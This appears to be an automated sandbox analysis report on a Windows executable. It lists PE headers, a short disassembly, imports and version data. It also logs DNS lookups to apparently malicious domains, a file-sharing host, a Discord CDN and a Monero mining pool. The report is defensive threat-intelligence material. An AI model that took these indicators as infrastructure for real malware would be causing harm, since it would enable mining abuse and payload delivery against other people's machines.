Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x60A40BAC [Tue May 18 18:47:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:996fe7decbf39b8813e0892e829e72ad

Entrypoint Preview

Instruction
call 00007FAFC073B26Ch
jmp 00007FAFC073557Dh
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FAFC0735726h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007FAFC0735750h
test ecx, 00000003h
jne 00007FAFC07356F1h
add eax, 00000000h
                                                                                                                                                                                                        lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                        lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                        mov eax, dword ptr [ecx]
                                                                                                                                                                                                        mov edx, 7EFEFEFFh
                                                                                                                                                                                                        add edx, eax
                                                                                                                                                                                                        xor eax, FFFFFFFFh
                                                                                                                                                                                                        xor eax, edx
                                                                                                                                                                                                        add ecx, 04h
                                                                                                                                                                                                        test eax, 81010100h
                                                                                                                                                                                                        je 00007FAFC07356EAh
                                                                                                                                                                                                        mov eax, dword ptr [ecx-04h]
                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                        je 00007FAFC0735734h
                                                                                                                                                                                                        test ah, ah
                                                                                                                                                                                                        je 00007FAFC0735726h
                                                                                                                                                                                                        test eax, 00FF0000h
                                                                                                                                                                                                        je 00007FAFC0735715h
                                                                                                                                                                                                        test eax, FF000000h
                                                                                                                                                                                                        je 00007FAFC0735704h
                                                                                                                                                                                                        jmp 00007FAFC07356CFh
                                                                                                                                                                                                        lea eax, dword ptr [ecx-01h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        lea eax, dword ptr [ecx-02h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        lea eax, dword ptr [ecx-03h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        lea eax, dword ptr [ecx-04h]
                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                        sub eax, ecx
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                        mov esi, 0041328Ch
                                                                                                                                                                                                        lea edi, dword ptr [ebp-20h]
                                                                                                                                                                                                        rep movsd
                                                                                                                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                        mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        je 00007FAFC073570Eh
                                                                                                                                                                                                        test byte ptr [eax], 00000008h

Rich Headers

Programming Language:
• [ C ] VS2008 build 21022
• [LNK] VS2008 build 21022
• [ASM] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [C++] VS2008 build 21022

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18088 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42000 | 0xdc88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x131e0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17388 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x18c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11fc6 | 0x12000 | False | 0.612263997396 | data | 6.70078106144 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x596e | 0x5a00 | False | 0.457204861111 | data | 5.66671030744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x28278 | 0x22200 | False | 0.254006410256 | data | 2.80829340035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x42000 | 0xdc88 | 0xde00 | False | 0.68262598536 | data | 6.37784764366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x4eff0 | 0x130 | data | Bulgarian | Bulgaria
RT_ICON | 0x425d0 | 0xea8 | data | Bulgarian | Bulgaria
RT_ICON | 0x43478 | 0x8a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x43d20 | 0x6c8 | data | Bulgarian | Bulgaria
RT_ICON | 0x443e8 | 0x568 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_ICON | 0x44950 | 0x25a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x46ef8 | 0x10a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x47fa0 | 0x988 | data | Bulgarian | Bulgaria
RT_ICON | 0x48928 | 0x468 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_ICON | 0x48e08 | 0xea8 | data | Bulgarian | Bulgaria
RT_ICON | 0x49cb0 | 0x8a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x4a558 | 0x568 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_ICON | 0x4aac0 | 0x25a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x4d068 | 0x10a8 | data | Bulgarian | Bulgaria
RT_ICON | 0x4e110 | 0x988 | data | Bulgarian | Bulgaria
RT_ICON | 0x4ea98 | 0x468 | GLS_BINARY_LSB_FIRST | Bulgarian | Bulgaria
RT_DIALOG | 0x4f2f0 | 0x72 | data | Bulgarian | Bulgaria
RT_STRING | 0x4f368 | 0x452 | data | Bulgarian | Bulgaria
RT_STRING | 0x4f7c0 | 0x1ec | data | Bulgarian | Bulgaria
RT_STRING | 0x4f9b0 | 0x2d4 | data | Bulgarian | Bulgaria
RT_ACCELERATOR | 0x4ef68 | 0x60 | data | Bulgarian | Bulgaria
RT_ACCELERATOR | 0x4efc8 | 0x28 | data | Bulgarian | Bulgaria
RT_GROUP_CURSOR | 0x4f120 | 0x14 | data | Bulgarian | Bulgaria
RT_GROUP_ICON | 0x48d90 | 0x76 | data | Bulgarian | Bulgaria
RT_GROUP_ICON | 0x4ef00 | 0x68 | data | Bulgarian | Bulgaria
RT_VERSION | 0x4f138 | 0x1b8 | COM executable for DOS | Bulgarian | Bulgaria

Imports

DLL | Import
KERNEL32.dll | SetLocaleInfoA, GetConsoleAliasesLengthW, VirtualQuery, GetDefaultCommConfigW, OpenJobObjectA, ReadConsoleA, GetConsoleAliasA, InterlockedDecrement, GetProfileSectionA, SetComputerNameW, GetTimeFormatA, GetConsoleAliasesA, GetConsoleTitleA, SetFileTime, FindResourceExA, Sleep, GetFileAttributesW, SetComputerNameExW, RaiseException, GetLongPathNameW, GetProcAddress, VirtualAlloc, GetAtomNameA, LocalAlloc, DnsHostnameToComputerNameA, GetFileType, GetModuleFileNameA, CreateIoCompletionPort, SetConsoleTitleW, GetModuleHandleA, GetStringTypeW, GetVersionExA, ReadConsoleInputW, EnumSystemLocalesW, CreateThread, HeapAlloc, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

Version Infos

Description | Data
ProjectVersion | 3.10.70.57
InternationalName | bomgvioci.iwa
Copyright | Copyrighz (C) 2021, fudkort
Translation | 0x0129 0x0794

Possible Origin

Language of compilation system    Country where language is spoken
Bulgarian                         Bulgaria

Network Behavior

Network Port Distribution

TCP Packets


DNS Queries

                                                                                                                                                                                                        Jan 14, 2022 00:15:18.142793894 CET192.168.2.48.8.8.80x60c7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.631000996 CET192.168.2.48.8.8.80x9905Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.719808102 CET192.168.2.48.8.8.80x4acbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.382601023 CET192.168.2.48.8.8.80xa2b4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.582433939 CET192.168.2.48.8.8.80x1c8cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.064352989 CET192.168.2.48.8.8.80xc340Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.237083912 CET192.168.2.48.8.8.80x2005Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.403347015 CET192.168.2.48.8.8.80x5113Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.567151070 CET192.168.2.48.8.8.80x9be3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.737056971 CET192.168.2.48.8.8.80xdd94Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.901120901 CET192.168.2.48.8.8.80x4237Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:24.925096989 CET192.168.2.48.8.8.80xac12Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.083369970 CET192.168.2.48.8.8.80x65dbStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.277966976 CET192.168.2.48.8.8.80xd16aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.443576097 CET192.168.2.48.8.8.80x2be3Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.139034986 CET192.168.2.48.8.8.80xe05Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.313374996 CET192.168.2.48.8.8.80xc920Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.475970984 CET192.168.2.48.8.8.80x45d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.929191113 CET192.168.2.48.8.8.80xd04fStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:42.591212988 CET192.168.2.48.8.8.80x6afStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.683623075 CET192.168.2.48.8.8.80x9e4bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.853013992 CET192.168.2.48.8.8.80x56abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.095482111 CET192.168.2.48.8.8.80x22c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.260747910 CET192.168.2.48.8.8.80xafe7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.424179077 CET192.168.2.48.8.8.80xda2aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.588679075 CET192.168.2.48.8.8.80x9b8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.767848015 CET192.168.2.48.8.8.80xe42dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.060847998 CET192.168.2.48.8.8.80x1ab9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.231005907 CET192.168.2.48.8.8.80xbd50Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.394597054 CET192.168.2.48.8.8.80x96b5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.560926914 CET192.168.2.48.8.8.80xdc5dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.750709057 CET192.168.2.48.8.8.80x9e07Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.917156935 CET192.168.2.48.8.8.80xee49Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:51.125756979 CET192.168.2.48.8.8.80x2ddaStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.295429945 CET192.168.2.48.8.8.80x10d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.453470945 CET192.168.2.48.8.8.80x9efdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.614363909 CET192.168.2.48.8.8.80x8aedStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.026356936 CET192.168.2.48.8.8.80xc7d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.208574057 CET192.168.2.48.8.8.80x4298Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.423022985 CET192.168.2.48.8.8.80x29f3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.580876112 CET192.168.2.48.8.8.80xc73aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.747313023 CET192.168.2.48.8.8.80x31e0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.914865971 CET192.168.2.48.8.8.80x9952Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:57.103195906 CET192.168.2.48.8.8.80xf2cStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.355787039 CET192.168.2.48.8.8.80x5dfaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.521006107 CET192.168.2.48.8.8.80x51daStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.755677938 CET192.168.2.48.8.8.80x9907Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.044022083 CET192.168.2.48.8.8.80x5b1bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.223881960 CET192.168.2.48.8.8.80xd305Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.390018940 CET192.168.2.48.8.8.80x48a5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.591588974 CET192.168.2.48.8.8.80x6886Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.824183941 CET192.168.2.48.8.8.80x7dc1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.016208887 CET192.168.2.48.8.8.80xcdf3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.189146996 CET192.168.2.48.8.8.80xd2abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.358738899 CET192.168.2.48.8.8.80x10e6Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.475105047 CET192.168.2.48.8.8.80x1d04Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.636070967 CET192.168.2.48.8.8.80x47a2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.801625967 CET192.168.2.48.8.8.80xd460Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.337502003 CET192.168.2.48.8.8.80xd5ffStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.555936098 CET192.168.2.48.8.8.80xb8a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.839423895 CET192.168.2.48.8.8.80xa9f5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:09.013679981 CET192.168.2.48.8.8.80xc4ecStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:11.631227970 CET192.168.2.48.8.8.80xb620Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.475086927 CET192.168.2.48.8.8.80x824cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.673590899 CET192.168.2.48.8.8.80xce37Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:13.988838911 CET192.168.2.48.8.8.80xe413Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.287476063 CET192.168.2.48.8.8.80xb20fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.658121109 CET192.168.2.48.8.8.80x165Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.495066881 CET192.168.2.48.8.8.80x185Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.692121983 CET192.168.2.48.8.8.80x7768Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.204607964 CET192.168.2.48.8.8.80xcd02Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.791950941 CET192.168.2.48.8.8.80x670cStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:22.426749945 CET192.168.2.48.8.8.80xd3feStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.147851944 CET192.168.2.48.8.8.80x3019Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.197062969 CET192.168.2.48.8.8.80xdbf8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.203850031 CET192.168.2.48.8.8.80x8de8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.748819113 CET192.168.2.48.8.8.80xa426Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.828166962 CET192.168.2.48.8.8.80x8a9Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.387123108 CET192.168.2.48.8.8.80x22eStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.736057043 CET192.168.2.48.8.8.80xdb81Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:17:13.778686047 CET192.168.2.48.8.8.80x5e1Standard query (0)patmushta.infoA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.739072084 CET8.8.8.8192.168.2.40x4acbNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.402050972 CET8.8.8.8192.168.2.40xa2b4No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.897456884 CET8.8.8.8192.168.2.40x1c8cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.083414078 CET8.8.8.8192.168.2.40xc340No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.562536001 CET8.8.8.8192.168.2.40x2005No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.423297882 CET8.8.8.8192.168.2.40x5113No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.586868048 CET8.8.8.8192.168.2.40x9be3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.754504919 CET8.8.8.8192.168.2.40xdd94No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.920911074 CET8.8.8.8192.168.2.40x4237No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:24.943259954 CET8.8.8.8192.168.2.40xac12No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.101136923 CET8.8.8.8192.168.2.40x65dbNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.297411919 CET8.8.8.8192.168.2.40xd16aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.160053968 CET8.8.8.8192.168.2.40xe05No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.333893061 CET8.8.8.8192.168.2.40xc920No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.495369911 CET8.8.8.8192.168.2.40x45d7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:42.897193909 CET8.8.8.8192.168.2.40x6afNo error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.703727007 CET8.8.8.8192.168.2.40x9e4bNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.873003960 CET8.8.8.8192.168.2.40x56abNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.115181923 CET8.8.8.8192.168.2.40x22c2No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.279900074 CET8.8.8.8192.168.2.40xafe7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.443753004 CET8.8.8.8192.168.2.40xda2aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
